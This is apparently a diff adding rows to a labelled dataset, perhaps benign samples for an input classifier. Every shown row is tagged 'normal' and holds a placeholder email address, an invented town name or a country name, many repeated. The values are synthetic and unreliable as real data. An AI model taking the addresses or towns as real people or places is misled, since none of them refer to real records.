+normal,'ymartin@ortiz.com' +normal,'sstephenson@ellison-schneider.net' +normal,'jasonross@armstrong.net' +normal,'hernandezfrederick@flores.org' +normal,'amyscott@taylor-robertson.info' +normal,'kimberly03@adams.com' +normal,'swatson@forbes.com' +normal,'justin53@krause.com' +normal,'qmartinez@jackson.com' +normal,'nicholsgail@ballard-harris.com' +normal,'roachdaniel@craig-gomez.com' +normal,'mitchellmelanie@blake.com' +normal,'chrisowen@simmons-galvan.com' +normal,'stevenburton@anderson.info' +normal,'lorraine47@campbell.com' +normal,'ewatkins@melton.com' +normal,'colemancourtney@estes.org' +normal,'powelljudy@richardson.com' +normal,'nicholsdustin@washington-sanchez.com' +normal,'teresawhite@dillon.com' +normal,'curtismcgee@cordova.net' +normal,'nmitchell@clark.biz' +normal,'william53@strong.com' +normal,'clloyd@davis.com' +normal,'scott55@sanchez.com' +normal,'zharris@carpenter.com' +normal,'edwardsryan@conley.net' +normal,'tamara53@miller.com' +normal,'brownjoshua@lewis-swanson.info' +normal,'mooreaaron@esparza.com' +normal,'michellecrawford@knight-brooks.net' +normal,'tricia79@carey.com' +normal,'coreygarcia@castro.org' +normal,'cchavez@smith-jensen.net' +normal,'jacqueline32@evans.net' +normal,'ellisashley@baker-bates.com' +normal,'ashley48@chavez-garcia.org' +normal,'marcus16@paul-pacheco.com' +normal,'grantashley@smith.info' +normal,'blackrebecca@yang-hill.net' +normal,'kristen43@morales.com' +normal,'blakebarbara@pugh.com' +normal,'paulbaker@ramirez-rangel.com' +normal,'andreagibson@alvarez-miller.com' +normal,'rowemichael@ward-reyes.com' +normal,'teresaware@fernandez.com' +normal,'katherine51@calderon-stokes.org' +normal,'michaelgilbert@baker.com' +normal,'danieldavidson@wallace-gray.org' +normal,'nguyenerika@coffey-lewis.com' +normal,'xgarcia@ross.com' +normal,'scottalicia@mitchell.com' +normal,'matthew08@ramos.com' +normal,'hflores@baldwin.net' +normal,'anthonyquinn@hernandez-baldwin.org' +normal,'bfernandez@griffin.com' +normal,'stephanie45@hill.com' +normal,'wendygeorge@martin.com' +normal,'christianhernandez@russell.com' +normal,'max90@chapman.com' +normal,'matthew95@brown-lopez.org' +normal,'lauren38@burke.com' +normal,'bonnie89@jensen.com' +normal,'lbaker@barnes-davis.com' +normal,'melissa25@townsend-brooks.com' +normal,'molly52@rasmussen-gonzalez.org' +normal,'briddle@flynn.com' +normal,'anthonyortiz@stokes.biz' +normal,'colleen36@pitts.com' +normal,'fmendez@greene-mcgrath.biz' +normal,'collinsgary@martinez-dean.com' +normal,'iperez@smith-conway.com' +normal,'glin@collins.info' +normal,'josephbrooks@hanson-chung.com' +normal,'walkerlaura@anderson-king.org' +normal,'kellivalenzuela@cunningham-stanley.info' +normal,'patricia79@marsh.biz' +normal,'kyle24@green-mckinney.org' +normal,'lauramurray@schwartz.info' +normal,'doylemarie@harris-carter.biz' +normal,'parkerfrank@parker.com' +normal,'morganwatkins@brown.com' +normal,'justin04@duffy.com' +normal,'melissa88@johnson.biz' +normal,'Nortonshire' +normal,'North Ronald' +normal,'New Valerieview' +normal,'Pamelaberg' +normal,'North Davidstad' +normal,'West Lisahaven' +normal,'Ryanville' +normal,'New Angelaborough' +normal,'Dawnfurt' +normal,'North Natalie' +normal,'North Danaborough' +normal,'Hudsonville' +normal,'Clarkland' +normal,'Lake Kariberg' +normal,'Joeburgh' +normal,'Port Paul' +normal,'Port James' +normal,'Robertborough' +normal,'Port Karenstad' +normal,'Wendyhaven' +normal,'South Beth' +normal,'New Rebeccaville' +normal,'Ryanville' +normal,'North Markville' +normal,'Tammyville' +normal,'Port Kristin' +normal,'North Peterberg' +normal,'Jeffreybury' +normal,'North Jennifer' +normal,'South Thomasside' +normal,'South Misty' +normal,'New Lisa' +normal,'Greggport' +normal,'South Shannonfort' +normal,'Kristiborough' +normal,'Caldwellborough' +normal,'Bellview' +normal,'Jacksonside' +normal,'Rodriguezbury' +normal,'Evelynshire' +normal,'Adrianmouth' +normal,'South Jeffrey' +normal,'Andrewton' +normal,'Penningtontown' +normal,'Lake Brandonchester' +normal,'Shawntown' +normal,'Rodriguezview' +normal,'Port Matthewton' +normal,'Desireeville' +normal,'Lake Aliciaville' +normal,'East Brittanychester' +normal,'Craigburgh' +normal,'Port Ericbury' +normal,'South Samantha' +normal,'Ricardoton' +normal,'Rosalesbury' +normal,'South Hannah' +normal,'Jonesbury' +normal,'East Ryanfort' +normal,'Scottborough' +normal,'New Wandafurt' +normal,'Lake Trevor' +normal,'North Natalie' +normal,'Aguilarmouth' +normal,'Riveraside' +normal,'Port Caleb' +normal,'West Sandy' +normal,'Johnhaven' +normal,'Nelsonfurt' +normal,'Juliaborough' +normal,'West Kevinville' +normal,'South Sherri' +normal,'West Jason' +normal,'Camachobury' +normal,'Alexandrastad' +normal,'Royshire' +normal,'Gonzalesville' +normal,'Lake David' +normal,'Josephfurt' +normal,'Gonzalezburgh' +normal,'South Ronaldchester' +normal,'Williamsfort' +normal,'North Austinside' +normal,'East Rachel' +normal,'Ronaldhaven' +normal,'Sarahfort' +normal,'Lake Charles' +normal,'New James' +normal,'North Patty' +normal,'South Joshuahaven' +normal,'South Stevenburgh' +normal,'East Desireetown' +normal,'Gomezmouth' +normal,'Lake Nancyhaven' +normal,'West Vanessa' +normal,'South Michelefort' +normal,'Port Javier' +normal,'Port Amyville' +normal,'Lake Kayla' +normal,'Morrisbury' +normal,'West Susanview' +normal,'Lake Susanshire' +normal,'North Stephen' +normal,'South Michaelchester' +normal,'North Jennifer' +normal,'Port Ethan' +normal,'West Cassie' +normal,'North Jerryshire' +normal,'Lisamouth' +normal,'Joshuamouth' +normal,'Tinaland' +normal,'Herreraville' +normal,'East Matthew' +normal,'New John' +normal,'Courtneyview' +normal,'New Lindaland' +normal,'Stanleyville' +normal,'Stevensland' +normal,'Lake Stanleyberg' +normal,'Navarrochester' +normal,'West Ronaldport' +normal,'North Terri' +normal,'Paynemouth' +normal,'New Elizabeth' +normal,'Port Jeffreyhaven' +normal,'Taylorside' +normal,'Lake Jamesport' +normal,'West Brian' +normal,'Heatherport' +normal,'Andersonborough' +normal,'Marissamouth' +normal,'Aaronchester' +normal,'Piercetown' +normal,'Lake Dakota' +normal,'Hallview' +normal,'Masonshire' +normal,'Lake Christopher' +normal,'Lake Bobby' +normal,'Baxterfurt' +normal,'Markborough' +normal,'New Brenda' +normal,'Port Travisbury' +normal,'West Ethan' +normal,'South Jesse' +normal,'East Randychester' +normal,'East Christinaport' +normal,'New Jamesfort' +normal,'Rodriguezstad' +normal,'Lake Stephenbury' +normal,'Port Craigmouth' +normal,'West Keith' +normal,'Port Aaronchester' +normal,'South James' +normal,'Stoneburgh' +normal,'North Alicia' +normal,'Port Robertmouth' +normal,'North Ashley' +normal,'Stanleyborough' +normal,'Byrdchester' +normal,'East Johnport' +normal,'Meganchester' +normal,'Lake Taraland' +normal,'Cartermouth' +normal,'Sharonland' +normal,'Jasonchester' +normal,'Bellberg' +normal,'Onealland' +normal,'Deborahborough' +normal,'Lake Alicia' +normal,'East Jessicaside' +normal,'Drakefort' +normal,'Howardchester' +normal,'Kevinton' +normal,'North Johnland' +normal,'South Terryborough' +normal,'West Shelbyburgh' +normal,'Obrienland' +normal,'West Stephaniemouth' +normal,'Port Jay' +normal,'New Dominique' +normal,'Port Shanemouth' +normal,'Lake Charles' +normal,'North Danafurt' +normal,'Kristenfort' +normal,'Laurenville' +normal,'North Mitchell' +normal,'Cristinaborough' +normal,'New Zachary' +normal,'Alexandraburgh' +normal,'West Carlos' +normal,'Robertchester' +normal,'Alyssaville' +normal,'Susanville' +normal,'Port Brandon' +normal,'New Josephshire' +normal,'Joeltown' +normal,'North Andrewmouth' +normal,'Lake Jillland' +normal,'Jonathanton' +normal,'South Jesusview' +normal,'East Amystad' +normal,'Samanthaview' +normal,'Brianchester' +normal,'Shellystad' +normal,'Mindytown' +normal,'South Matthew' +normal,'North Roger' +normal,'East Gregorybury' +normal,'West Stephaniehaven' +normal,'Brownstad' +normal,'South Brittany' +normal,'South William' +normal,'Faulknerborough' +normal,'Theresamouth' +normal,'Jennifertown' +normal,'Goodwinville' +normal,'Paulstad' +normal,'East Melissa' +normal,'Savannahfurt' +normal,'Jenniferborough' +normal,'North Lauren' +normal,'East James' +normal,'Lindseyfurt' +normal,'Port Daleside' +normal,'West Ericstad' +normal,'Perryport' +normal,'Tammychester' +normal,'South Erica' +normal,'Taylorside' +normal,'Logantown' +normal,'Lake Michael' +normal,'North Jennifer' +normal,'Michaelton' +normal,'Lake Samuelside' +normal,'North Spencer' +normal,'East Charlesborough' +normal,'West Nathan' +normal,'Heathertown' +normal,'Christinastad' +normal,'South Christian' +normal,'Knappberg' +normal,'Alvarezside' +normal,'Alexandertown' +normal,'South Toddtown' +normal,'New Brian' +normal,'South Coryberg' +normal,'Andrewsport' +normal,'Smithside' +normal,'New Jayburgh' +normal,'South Tonya' +normal,'Leehaven' +normal,'New Thomasfort' +normal,'Adamsmouth' +normal,'Christinaside' +normal,'Port Georgeton' +normal,'Washingtonfort' +normal,'Rogerton' +normal,'Lake Sarahmouth' +normal,'Tuckershire' +normal,'New Courtneyborough' +normal,'Natalieberg' +normal,'Amandaburgh' +normal,'Harrellville' +normal,'Patrickland' +normal,'Loriberg' +normal,'Stokesfort' +normal,'West Robertstad' +normal,'Kellychester' +normal,'Adrianmouth' +normal,'Jasonmouth' +normal,'South Michellechester' +normal,'New Ronald' +normal,'Lake Crystal' +normal,'Florestown' +normal,'Lake Kenneth' +normal,'West Sarah' +normal,'East Joe' +normal,'Walshport' +normal,'East Deborah' +normal,'Smithberg' +normal,'Davidsonland' +normal,'West Meganview' +normal,'New Stacey' +normal,'Lake Melanie' +normal,'Kevinburgh' +normal,'Richardport' +normal,'Shannonchester' +normal,'New Shawn' +normal,'Kathychester' +normal,'Brownfort' +normal,'Conniemouth' +normal,'Diazmouth' +normal,'North Marieside' +normal,'Debraport' +normal,'Richardmouth' +normal,'West Erikachester' +normal,'South Ambertown' +normal,'Kimtown' +normal,'Duffychester' +normal,'Lake Jennifer' +normal,'Zacharyside' +normal,'New Amanda' +normal,'Lake Danny' +normal,'Wilsonton' +normal,'Lucaston' +normal,'Jenningsberg' +normal,'New Denisechester' +normal,'Timothyside' +normal,'West Fernando' +normal,'South Jodi' +normal,'Port Joseph' +normal,'Jacobshire' +normal,'Edwardfurt' +normal,'Port Jamie' +normal,'Port Patrick' +normal,'South Hannah' +normal,'Lake Codyport' +normal,'North Brian' +normal,'South Kellyfort' +normal,'Hillside' +normal,'Amandaville' +normal,'Vanessastad' +normal,'New Tiffanyberg' +normal,'Bishopshire' +normal,'Roseview' +normal,'Lake Derrick' +normal,'East Claytonton' +normal,'Lake William' +normal,'Jessicaside' +normal,'Stephanieville' +normal,'Johnsonborough' +normal,'Smithchester' +normal,'North Tiffany' +normal,'Robertport' +normal,'South Steven' +normal,'Abigailfort' +normal,'Coreytown' +normal,'Katherinemouth' +normal,'New Joshua' +normal,'South Henryfort' +normal,'Danaberg' +normal,'New Chad' +normal,'New Gina' +normal,'South Benjamin' +normal,'Karenchester' +normal,'Jeremyville' +normal,'Gibbsfort' +normal,'New Carolynshire' +normal,'Mccartytown' +normal,'Amandaville' +normal,'Michelleville' +normal,'Bobshire' +normal,'Port Lance' +normal,'West Lynn' +normal,'South Maria' +normal,'West Sandrashire' +normal,'Harrischester' +normal,'Russellfort' +normal,'East Timothy' +normal,'North Tyler' +normal,'East Danhaven' +normal,'Lake Joy' +normal,'Port Ronniehaven' +normal,'East Nicholasville' +normal,'Atkinshaven' +normal,'Lake Stephen' +normal,'North Jamesville' +normal,'New Shellyland' +normal,'North Sherriburgh' +normal,'Sharonshire' +normal,'West Vanessa' +normal,'Maryshire' +normal,'West Joshua' +normal,'Lake Dana' +normal,'West Sarah' +normal,'East David' +normal,'Wellston' +normal,'New Kylie' +normal,'Coreyton' +normal,'Johnsonborough' +normal,'Chaseborough' +normal,'New Shannonchester' +normal,'Clarkland' +normal,'Travismouth' +normal,'Lake Antonioville' +normal,'Gonzalesmouth' +normal,'West Johnbury' +normal,'Kristinehaven' +normal,'Karenfurt' +normal,'Heatherbury' +normal,'West Andres' +normal,'North Christopherstad' +normal,'New Peterborough' +normal,'South Shannon' +normal,'New Clayton' +normal,'Lake David' +normal,'Marthaburgh' +normal,'Lake Jordanchester' +normal,'Taraberg' +normal,'Lake Johnborough' +normal,'Johnnyton' +normal,'Port Eddiefort' +normal,'Jasmineland' +normal,'Port Jameshaven' +normal,'East David' +normal,'South Morgan' +normal,'Garciastad' +normal,'Stephenstown' +normal,'Newmanshire' +normal,'New Jenna' +normal,'Mcleanhaven' +normal,'Port Jennifer' +normal,'West Jeremy' +normal,'Liton' +normal,'Dicksonmouth' +normal,'New Manuelmouth' +normal,'North Mark' +normal,'Farmerside' +normal,'Blackburnport' +normal,'East Elizabeth' +normal,'Wilsonborough' +normal,'Robertsport' +normal,'Adrianstad' +normal,'Elizabethtown' +normal,'South Nicoleton' +normal,'North Brian' +normal,'Larryland' +normal,'Port Christopherbury' +normal,'Port Marymouth' +normal,'Cassandramouth' +normal,'New Mariafort' +normal,'Robertstown' +normal,'West Michael' +normal,'Georgeborough' +normal,'Browntown' +normal,'Oliviaside' +normal,'Port Kent' +normal,'Lake Richardview' +normal,'North Bill' +normal,'Lake Shaun' +normal,'Port Jeffrey' +normal,'Kennethfurt' +normal,'New Thomasview' +normal,'Arthurstad' +normal,'Tiffanyshire' +normal,'Jesusport' +normal,'Aliciaport' +normal,'Nicholefort' +normal,'Lake Chaseborough' +normal,'Lake Tracie' +normal,'West Michelle' +normal,'Lucaschester' +normal,'Port Amber' +normal,'Codyborough' +normal,'Collinsshire' +normal,'Port Robynton' +normal,'Lake Heatherbury' +normal,'Santosmouth' +normal,'North Timothyfort' +normal,'Ibarraton' +normal,'Amyside' +normal,'Watsonfort' +normal,'Lake Amber' +normal,'South Ashleybury' +normal,'Lake Austin' +normal,'South Matthewchester' +normal,'Douglasfurt' +normal,'Andersonburgh' +normal,'North Nathaniel' +normal,'Wilsonmouth' +normal,'Carlaport' +normal,'East Alexandriaview' +normal,'North Stephen' +normal,'Burgessburgh' +normal,'Wesleytown' +normal,'East Michael' +normal,'West Linda' +normal,'West James' +normal,'Lake Nicholasport' +normal,'Adamston' +normal,'New Stephanieberg' +normal,'New Aaron' +normal,'New Lisa' +normal,'Sandraburgh' +normal,'New Tom' +normal,'Lake Tylerport' +normal,'Lake Jennifer' +normal,'Davidborough' +normal,'East Eric' +normal,'Torresport' +normal,'West Jamie' +normal,'Mendozaburgh' +normal,'Port Russell' +normal,'Victoriastad' +normal,'Stevenberg' +normal,'Bennettchester' +normal,'New Brent' +normal,'Lake Timothyton' +normal,'Howellburgh' +normal,'North Candiceburgh' +normal,'Port Anthonymouth' +normal,'Lake Kevinfurt' +normal,'South Richardmouth' +normal,'Lake Samantha' +normal,'East Misty' +normal,'Colonfurt' +normal,'Madisonside' +normal,'Port Ashley' +normal,'Shawnville' +normal,'Port Kevin' +normal,'Lake Vincent' +normal,'Velazquezmouth' +normal,'West Trevorville' +normal,'East Elizabeth' +normal,'Nicolebury' +normal,'West Matthew' +normal,'Port Stephanie' +normal,'New Brandon' +normal,'New Tracy' +normal,'Grantfort' +normal,'Harrismouth' +normal,'Parkbury' +normal,'New Jessicachester' +normal,'Leslieville' +normal,'Lake Mary' +normal,'Fergusonton' +normal,'Lopezfort' +normal,'North John' +normal,'New Anthony' +normal,'Kimberlyport' +normal,'Annettemouth' +normal,'West Cynthialand' +normal,'Hullmouth' +normal,'Kristenville' +normal,'Lake Allenside' +normal,'Leahbury' +normal,'North Anitaport' +normal,'Cruzmouth' +normal,'Brownbury' +normal,'Hollymouth' +normal,'Kramermouth' +normal,'North Christianton' +normal,'Michelleberg' +normal,'West Brittanyview' +normal,'Lake Zachary' +normal,'Paulaborough' +normal,'East Christina' +normal,'Montoyaberg' +normal,'West Juliefurt' +normal,'Erikaport' +normal,'Riveraborough' +normal,'Port Katherinechester' +normal,'West Charles' +normal,'East Allison' +normal,'Collinston' +normal,'Riversmouth' +normal,'Lake Warren' +normal,'Millerbury' +normal,'Fieldsside' +normal,'Angelaton' +normal,'West Cherylberg' +normal,'East Darlene' +normal,'Boyerhaven' +normal,'East Elizabeth' +normal,'North Tiffany' +normal,'East Brendaland' +normal,'East Johnborough' +normal,'Richardchester' +normal,'West Bridgetmouth' +normal,'Martinezmouth' +normal,'North Wandaport' +normal,'Jenniferburgh' +normal,'West Stephanieport' +normal,'South Diane' +normal,'Lake Tina' +normal,'North David' +normal,'South Brittany' +normal,'Johnshaven' +normal,'Port Aaron' +normal,'North Timothyborough' +normal,'Ashleyland' +normal,'Lindaview' +normal,'Ronaldfurt' +normal,'Lake Justinside' +normal,'Robertmouth' +normal,'Bushton' +normal,'South Jenniferville' +normal,'East Johnville' +normal,'Lake James' +normal,'Ryanmouth' +normal,'Harveyshire' +normal,'Lewistown' +normal,'West Judith' +normal,'Kristinton' +normal,'Clayside' +normal,'Jasonport' +normal,'East Brianton' +normal,'Lake Carl' +normal,'North Jenniferville' +normal,'South Michelle' +normal,'Nicaragua' +normal,'Gambia' +normal,'Antarctica (the territory South of 60 deg S)' +normal,'Kazakhstan' +normal,'Bosnia and Herzegovina' +normal,'Comoros' +normal,'New Caledonia' +normal,'Saint Lucia' +normal,'New Caledonia' +normal,'Malawi' +normal,'Monaco' +normal,'American Samoa' +normal,'Sri Lanka' +normal,'Djibouti' +normal,'Chad' +normal,'Algeria' +normal,'Montserrat' +normal,'Kazakhstan' +normal,'Estonia' +normal,'Tunisia' +normal,'French Guiana' +normal,'Turkmenistan' +normal,'Nepal' +normal,'Netherlands' +normal,'Taiwan' +normal,'Cocos (Keeling) Islands' +normal,'United States Minor Outlying Islands' +normal,'Tanzania' +normal,'Malawi' +normal,'Netherlands Antilles' +normal,'India' +normal,'United Kingdom' +normal,'Germany' +normal,'Bosnia and Herzegovina' +normal,'Chad' +normal,'British Indian Ocean Territory (Chagos Archipelago)' +normal,'Mexico' +normal,'Cameroon' +normal,'Lebanon' +normal,'Cape Verde' +normal,'Algeria' +normal,'Netherlands' +normal,'Antigua and Barbuda' +normal,'French Southern Territories' +normal,'Cuba' +normal,'British Indian Ocean Territory (Chagos Archipelago)' +normal,'Eritrea' +normal,'Eritrea' +normal,'Korea' +normal,'Libyan Arab Jamahiriya' +normal,'United Arab Emirates' +normal,'Sri Lanka' +normal,'Uzbekistan' +normal,'Cyprus' +normal,'Faroe Islands' +normal,'Turks and Caicos Islands' +normal,'Philippines' +normal,'Netherlands' +normal,'Moldova' +normal,'Jordan' +normal,'United Arab Emirates' +normal,'Korea' +normal,'Gabon' +normal,'Kenya' +normal,'Cyprus' +normal,'Nepal' +normal,'Mayotte' +normal,'Italy' +normal,'Botswana' +normal,'Italy' +normal,'India' +normal,'Cook Islands' +normal,'British Virgin Islands' +normal,'Saint Vincent and the Grenadines' +normal,'Haiti' +normal,'Suriname' +normal,'Norfolk Island' +normal,'Pakistan' +normal,'Pakistan' +normal,'Mongolia' +normal,'Ecuador' +normal,'Turkmenistan' +normal,'Palestinian Territory' +normal,'Tokelau' +normal,'Saint Pierre and Miquelon' +normal,'Angola' +normal,'Macao' +normal,'Philippines' +normal,'Bangladesh' +normal,'Angola' +normal,'Saint Barthelemy' +normal,'Ireland' +normal,'Guinea-Bissau' +normal,'Cook Islands' +normal,'Saint Barthelemy' +normal,'Costa Rica' +normal,'Greenland' +normal,'Jordan' +normal,'Botswana' +normal,'Aruba' +normal,'Tonga' +normal,'Saint Kitts and Nevis' +normal,'United Arab Emirates' +normal,'Liechtenstein' +normal,'Jersey' +normal,'Tunisia' +normal,'Gambia' +normal,'Faroe Islands' +normal,'Iceland' +normal,'New Caledonia' +normal,'Fiji' +normal,'Hungary' +normal,'Mozambique' +normal,'Cape Verde' +normal,'Niue' +normal,'Brunei Darussalam' +normal,'Andorra' +normal,'Bangladesh' +normal,'China' +normal,'Armenia' +normal,'Ghana' +normal,'Trinidad and Tobago' +normal,'New Caledonia' +normal,'Haiti' +normal,'Marshall Islands' +normal,'Lao People's Democratic Republic' +normal,'Taiwan' +normal,'Jordan' +normal,'Spain' +normal,'Cook Islands' +normal,'Iran' +normal,'Bahamas' +normal,'Guinea-Bissau' +normal,'Seychelles' +normal,'Philippines' +normal,'Macao' +normal,'Hungary' +normal,'Palestinian Territory' +normal,'Palestinian Territory' +normal,'Kuwait' +normal,'Montenegro' +normal,'Netherlands Antilles' +normal,'Iraq' +normal,'Montenegro' +normal,'El Salvador' +normal,'Switzerland' +normal,'Western Sahara' +normal,'Netherlands Antilles' +normal,'Namibia' +normal,'Bouvet Island (Bouvetoya)' +normal,'North Macedonia' +normal,'China' +normal,'France' +normal,'Chile' +normal,'North Macedonia' +normal,'Palestinian Territory' +normal,'Micronesia' +normal,'Senegal' +normal,'Mozambique' +normal,'San Marino' +normal,'Mauritius' +normal,'Iraq' +normal,'Equatorial Guinea' +normal,'Burundi' +normal,'Palau' +normal,'Morocco' +normal,'Belgium' +normal,'Uganda' +normal,'Georgia' +normal,'Jordan' +normal,'Gabon' +normal,'Sao Tome and Principe' +normal,'Jordan' +normal,'Niger' +normal,'Afghanistan' +normal,'Luxembourg' +normal,'Costa Rica' +normal,'Malta' +normal,'Timor-Leste' +normal,'Finland' +normal,'Somalia' +normal,'Cook Islands' +normal,'American Samoa' +normal,'Sao Tome and Principe' +normal,'New Caledonia' +normal,'Peru' +normal,'Malaysia' +normal,'Gambia' +normal,'Bhutan' +normal,'Ireland' +normal,'Saint Vincent and the Grenadines' +normal,'Sao Tome and Principe' +normal,'Guyana' +normal,'Saint Martin' +normal,'Hong Kong' +normal,'Vanuatu' +normal,'Haiti' +normal,'Saint Kitts and Nevis' +normal,'New Caledonia' +normal,'Saint Lucia' +normal,'Syrian Arab Republic' +normal,'Hong Kong' +normal,'Tajikistan' +normal,'Cote d'Ivoire' +normal,'Germany' +normal,'Western Sahara' +normal,'Ukraine' +normal,'Algeria' +normal,'Bahamas' +normal,'Bosnia and Herzegovina' +normal,'Nigeria' +normal,'Macao' +normal,'Reunion' +normal,'Northern Mariana Islands' +normal,'Zimbabwe' +normal,'Pakistan' +normal,'Israel' +normal,'Bouvet Island (Bouvetoya)' +normal,'Israel' +normal,'Guadeloupe' +normal,'Niue' +normal,'Cyprus' +normal,'Guam' +normal,'Grenada' +normal,'Russian Federation' +normal,'Guernsey' +normal,'Heard Island and McDonald Islands' +normal,'Cameroon' +normal,'Germany' +normal,'Guadeloupe' +normal,'Belize' +normal,'Equatorial Guinea' +normal,'Guam' +normal,'Spain' +normal,'Tuvalu' +normal,'Switzerland' +normal,'Saint Martin' +normal,'Northern Mariana Islands' +normal,'Falkland Islands (Malvinas)' +normal,'Northern Mariana Islands' +normal,'Finland' +normal,'Turkmenistan' +normal,'Canada' +normal,'Isle of Man' +normal,'Myanmar' +normal,'Indonesia' +normal,'Cyprus' +normal,'New Caledonia' +normal,'Bosnia and Herzegovina' +normal,'Denmark' +normal,'United Arab Emirates' +normal,'Ethiopia' +normal,'Kiribati' +normal,'Niue' +normal,'Tuvalu' +normal,'Bulgaria' +normal,'South Georgia and the South Sandwich Islands' +normal,'Finland' +normal,'Venezuela' +normal,'Burundi' +normal,'Yemen' +normal,'Falkland Islands (Malvinas)' +normal,'Australia' +normal,'Algeria' +normal,'Dominican Republic' +normal,'Guyana' +normal,'Grenada' +normal,'Wallis and Futuna' +normal,'Palestinian Territory' +normal,'Niue' +normal,'Brazil' +normal,'Yemen' +normal,'Puerto Rico' +normal,'Korea' +normal,'Northern Mariana Islands' +normal,'Bahamas' +normal,'Falkland Islands (Malvinas)' +normal,'Cape Verde' +normal,'Wallis and Futuna' +normal,'Libyan Arab Jamahiriya' +normal,'Cuba' +normal,'Denmark' +normal,'Grenada' +normal,'Bermuda' +normal,'Botswana' +normal,'Estonia' +normal,'Liechtenstein' +normal,'Lao People's Democratic Republic' +normal,'Gambia' +normal,'Italy' +normal,'South Africa' +normal,'San Marino' +normal,'Haiti' +normal,'Wallis and Futuna' +normal,'Mozambique' +normal,'Mayotte' +normal,'Colombia' +normal,'Bermuda' +normal,'Singapore' +normal,'British Indian Ocean Territory (Chagos Archipelago)' +normal,'Brunei Darussalam' +normal,'Iraq' +normal,'Faroe Islands' +normal,'Belize' +normal,'Tanzania' +normal,'Mayotte' +normal,'Nauru' +normal,'Russian Federation' +normal,'Togo' +normal,'French Guiana' +normal,'Togo' +normal,'Mali' +normal,'Chad' +normal,'Romania' +normal,'Vanuatu' +normal,'Lebanon' +normal,'Israel' +normal,'Turkmenistan' +normal,'Ecuador' +normal,'Holy See (Vatican City State)' +normal,'Falkland Islands (Malvinas)' +normal,'Uruguay' +normal,'Faroe Islands' +normal,'Turkmenistan' +normal,'Taiwan' +normal,'Switzerland' +normal,'Sao Tome and Principe' +normal,'Greenland' +normal,'China' +normal,'Eritrea' +normal,'Cuba' +normal,'Bolivia' +normal,'French Guiana' +normal,'Slovakia (Slovak Republic)' +normal,'Hungary' +normal,'Iran' +normal,'Guadeloupe' +normal,'Lao People's Democratic Republic' +normal,'Saint Martin' +normal,'Bhutan' +normal,'Paraguay' +normal,'Bangladesh' +normal,'Vanuatu' +normal,'Tajikistan' +normal,'Thailand' +normal,'Monaco' +normal,'Ecuador' +normal,'Chad' +normal,'Kuwait' +normal,'Comoros' +normal,'Mozambique' +normal,'Guyana' +normal,'Saudi Arabia' +normal,'Ethiopia' +normal,'Argentina' +normal,'Burkina Faso' +normal,'Somalia' +normal,'Albania' +normal,'Qatar' +normal,'Zimbabwe' +normal,'Heard Island and McDonald Islands' +normal,'Kenya' +normal,'France' +normal,'Panama' +normal,'Saudi Arabia' +normal,'Mongolia' +normal,'Georgia' +normal,'Reunion' +normal,'Niue' +normal,'Uganda' +normal,'Swaziland' +normal,'Greenland' +normal,'Christmas Island' +normal,'Palestinian Territory' +normal,'American Samoa' +normal,'Mozambique' +normal,'French Polynesia' +normal,'Central African Republic' +normal,'Anguilla' +normal,'Kazakhstan' +normal,'Kenya' +normal,'Tuvalu' +normal,'Togo' +normal,'British Indian Ocean Territory (Chagos Archipelago)' +normal,'Uganda' +normal,'Jordan' +normal,'Paraguay' +normal,'Reunion' +normal,'Tanzania' +normal,'Norway' +normal,'Lebanon' +normal,'Seychelles' +normal,'Belize' +normal,'Argentina' +normal,'Lao People's Democratic Republic' +normal,'Peru' +normal,'Saint Barthelemy' +normal,'Jordan' +normal,'Czech Republic' +normal,'Falkland Islands (Malvinas)' +normal,'Brunei Darussalam' +normal,'Nauru' +normal,'Lesotho' +normal,'Kiribati' +normal,'Benin' +normal,'Oman' +normal,'Trinidad and Tobago' +normal,'Guinea' +normal,'Qatar' +normal,'Yemen' +normal,'Israel' +normal,'Swaziland' +normal,'Mauritius' +normal,'Georgia' +normal,'Luxembourg' +normal,'Lebanon' +normal,'Korea' +normal,'Germany' +normal,'Montenegro' +normal,'Vanuatu' +normal,'Georgia' +normal,'Belize' +normal,'Brazil' +normal,'Botswana' +normal,'Belarus' +normal,'United Kingdom' +normal,'Egypt' +normal,'Portugal' +normal,'Jamaica' +normal,'Kazakhstan' +normal,'Bangladesh' +normal,'Tuvalu' +normal,'Nauru' +normal,'Lao People's Democratic Republic' +normal,'Taiwan' +normal,'Norway' +normal,'Angola' +normal,'Uzbekistan' +normal,'Mauritius' +normal,'Christmas Island' +normal,'Cambodia' +normal,'Seychelles' +normal,'South Africa' +normal,'Vietnam' +normal,'Palestinian Territory' +normal,'Isle of Man' +normal,'Tajikistan' +normal,'Monaco' +normal,'Pitcairn Islands' +normal,'Greenland' +normal,'Chad' +normal,'Venezuela' +normal,'Portugal' +normal,'Grenada' +normal,'Cayman Islands' +normal,'Ecuador' +normal,'Liberia' +normal,'India' +normal,'Chile' +normal,'Bhutan' +normal,'Haiti' +normal,'Cayman Islands' +normal,'Korea' +normal,'Bhutan' +normal,'Zambia' +normal,'Rwanda' +normal,'Canada' +normal,'Grenada' +normal,'Singapore' +normal,'Argentina' +normal,'Trinidad and Tobago' +normal,'Portugal' +normal,'Brazil' +normal,'French Southern Territories' +normal,'Georgia' +normal,'Sudan' +normal,'Falkland Islands (Malvinas)' +normal,'United States Virgin Islands' +normal,'China' +normal,'Myanmar' +normal,'Papua New Guinea' +normal,'Venezuela' +normal,'United States Virgin Islands' +normal,'Uzbekistan' +normal,'Cote d'Ivoire' +normal,'India' +normal,'Latvia' +normal,'Rwanda' +normal,'Moldova' +normal,'Angola' +normal,'Ethiopia' +normal,'Norfolk Island' +normal,'Singapore' +normal,'Iran' +normal,'Montenegro' +normal,'Bouvet Island (Bouvetoya)' +normal,'French Southern Territories' +normal,'Heard Island and McDonald Islands' +normal,'Mauritius' +normal,'Micronesia' +normal,'Hong Kong' +normal,'France' +normal,'French Polynesia' +normal,'Belgium' +normal,'Kiribati' +normal,'Qatar' +normal,'Czech Republic' +normal,'French Guiana' +normal,'Lebanon' +normal,'Angola' +normal,'Dominican Republic' +normal,'Sri Lanka' +normal,'Andorra' +normal,'Bouvet Island (Bouvetoya)' +normal,'Angola' +normal,'Grenada' +normal,'Jamaica' +normal,'Cambodia' +normal,'French Southern Territories' +normal,'Armenia' +normal,'Bosnia and Herzegovina' +normal,'Svalbard & Jan Mayen Islands' +normal,'Somalia' +normal,'Bolivia' +normal,'Thailand' +normal,'Gambia' +normal,'Lao People's Democratic Republic' +normal,'Swaziland' +normal,'Gambia' +normal,'Saint Pierre and Miquelon' +normal,'Burundi' +normal,'Japan' +normal,'Equatorial Guinea' +normal,'Seychelles' +normal,'Guyana' +normal,'Eritrea' +normal,'Italy' +normal,'Italy' 